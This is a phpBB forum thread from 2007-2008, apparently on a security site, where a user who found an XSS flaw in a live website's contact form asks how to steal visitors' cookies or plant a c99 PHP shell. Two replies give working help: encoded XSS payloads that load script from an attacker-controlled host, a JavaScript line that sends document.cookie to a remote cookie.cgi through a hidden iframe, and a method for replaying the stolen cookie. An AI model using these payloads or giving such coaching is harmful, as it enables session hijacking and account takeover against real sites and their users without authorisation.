| 
  
        |  |  |  
      
        |  |  
  | 
  
    | 
	|  | Menu |  |  
     
     | 
      
       | 
        
         | 
          
           | 
						|  |  |  Home |  |  |  |  |  |  |  |  Discussions |  |  |  |  |  |  |  |  Tools |  |  |  |  |  |  |  |  Affiliates |  |  |  |  |  |  |  |  Content |  |  |  |  |  |  |  |  Info |  |  |  |  |  |  |  |  |  |  
  
    | 
	|  | User Info |  |  
     
     | 
      
       | 
        
         | 
          
           |  Membership: 
  Latest: MichaelSnaRe 
  New Today: 0 
  New Yesterday: 0 
  Overall: 9144 
 
  People Online: 
  Visitors: 310 
  Members: 0 
  Total: 310 
 |  |  |  |  |  
  
    | 
	|  | Full disclosure |  |  
     
     | 
      
       | 
        
         | 
          
           | CyberDanube Security Research 20251014-0 | Multiple Vulnerabilities in Phoenix Contact QUINT4 UPS apis.google.com - Insecure redirect via __lu parameter(exploited in the wild)
 Urgent Security Vulnerabilities Discovered in Mercku Routers Model M6a
 Re: Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
 Security Advisory: Multiple High-Severity Vulnerabilities in Suno.com (JWT Leakage, IDOR, DoS)
 [SBA-ADV-20250730-01] CVE-2025-39664: Checkmk Path Traversal
 [SBA-ADV-20250724-01] CVE-2025-32919: Checkmk Agent Privilege Escalation via Insecure Temporary Files
 CVE-2025-59397 - Open Web Analytics SQL Injection
 Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
 Re: Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
 Re: Defense in depth -- the Microsoft way (part 93): SRP/SAFERwhitelisting goes black on Windows 11
 Re: [FD]: "Glass Cage" – Zero-Click iMessage ? Persistent iOS Compromise + Bricking (CVE-2025-24085 / 24201, CNVD-2025-07885)
 Re: [FD]Full Disclosure: CVE-2025-31200 & CVE-2025-31201 – 0-Click iMessage Chain ? Secure Enclave Key Theft, Wormable RCE, Crypto Theft
 Samtools v1.22.1 Uncontrolled Memory Allocation from Large BED Intervals Causes Denial-of-Service in Samtools/HTSlib
 Samtools v1.22.1 Improper Handling of Excessive Histogram Bin Counts in Samtools Coverage Leads to Stack Overflow
 
 |  |  |  |  |  | 
  
    | 
	|  |  |  |  
        
          | 
              
                | 
                    
                      | 
                          
                            | 
	| 
	
		|  |  |  
		|  | IT Security and Insecurity Portal |  |  
 
	|  | XSS on Forum - remote PHP shell or cookie.cgi questions |  |  
	| 
	
		|  Posted: Thu Dec 20, 2007 1:27 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| onetwothree |  | Beginner |  |  
  |  |  |  | Joined: Oct 20, 2007 |  | Posts: 3 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| I found a website that is vulnerable to and XSS attack via a contact forum. I am able to post the following popup; 
 [img]>"><ScRiPt%20%0a%0d>alert(1379844939)%3B</ScRiPt>.[/img]
 
 Now I have found a cookie logging cgi script that is in place on "my server" but I am not sure how to encode the path to my remote cookie stealer as the encoding above
 
 My questions are these:
 1.What type of encoding is the script above?
 2.Can I modify the above to call a php shell (c99), or to steal vistors cookies with my cookie.cgi script
 
 thanks in advance for help pointing me in the right direction
 |  |  
		|  |  |  
	|  |  |  | 
 
	|  |  |  |  
	| 
	
		|  Posted: Thu Dec 20, 2007 3:18 pm |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| waraxe |  | Site admin |  |  
  |  |  |  | Joined: May 11, 2004 |  | Posts: 2407 |  | Location: Estonia, Tartu |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			| First of all, forget c99 shell in this stage of actions. You are going to steal the cookie, so ultimate goal right now is to have user plaintext password, password hash or session ID. And if you can use this information to impersonate the victim (usually admin), them maybe you can somehow reach to php shell level. This specific target seems to have some input filtering in place, so it probably needs some testing and probing.
 My suggestion is something like
 
 
  	  | Code: |  	  | [img]>"><ScRiPt%20%0a%0dsrc%3Dhttp%3A%2F%2Fmyhosting.com%2Fjs.js></ScRiPt>.[/img]
 
 | 
 
 And then put javascript file to your hosting server and that js will do the cookie stealing by image url for example.
 |  |  
		|  |  |  
	|  |  
	|  | Re: XSS on Forum - remote PHP shell or cookie.cgi questions |  |  
	| 
	
		|  Posted: Wed Mar 12, 2008 2:22 am |   |  |  
	| 
	
		| 
		
			| 
			
				| 
				| Oilik |  | Active user |  |  
  |  |  |  | Joined: Mar 05, 2008 |  | Posts: 35 |  |  |  |  
 
 |  |  
			|  |  |  
 
 | 
		
			|  	  | onetwothree wrote: |  	  | I found a website that is vulnerable to and XSS attack via a contact forum. I am able to post the following popup; 
 [img]>"><ScRiPt%20%0a%0d>alert(1379844939)%3B</ScRiPt>.[/img]
 
 Now I have found a cookie logging cgi script that is in place on "my server" but I am not sure how to encode the path to my remote cookie stealer as the encoding above
 
 My questions are these:
 1.What type of encoding is the script above?
 2.Can I modify the above to call a php shell (c99), or to steal vistors cookies with my cookie.cgi script
 
 thanks in advance for help pointing me in the right direction
 | 
 
 Since this is only XSS, you can only put client-side scripting in there. You will need to steal a cookie[mm yummy].
 I suggest doing:
 
  	  | Code: |  	  | [img]>"><script src=http://yoursite.com/hola.js>[/img] | 
 And in hola.js on yoursite.com, put the following code:
 
  	  | Code: |  	  | document.write('<iframe src="http://yoursite.com/cookie.cgi?cookie=' + document.cookie + '" border="0" height="0px" width="0px"></iframe>');
 
 | 
 Not the best way to do it, but gets the job done.
 
 Then once you have the cookie[if you have firefox get AnEC, and just edit the values or add them, and ignore this]:
 go to your browser and put:
 
 or something like that, I suggest 1 cookie at a time. 	  | Code: |  	  | javascript:void(document.cookie='cookie=here'); | 
 |  |  
		|  |  |  
	|  |  |  | 
 
	| www.waraxe.us Forum Index -> Cross-site scripting aka XSS 
 
	
		| You cannot post new topics in this forum You cannot reply to topics in this forum
 You cannot edit your posts in this forum
 You cannot delete your posts in this forum
 You cannot vote in polls in this forum
 
 | All times are GMT Page 1 of 1
 
 |  |  
	|  |  
 Powered by phpBB © 2001-2008 phpBB Group
 
 
 
 
 |  |  |  |  |  |  |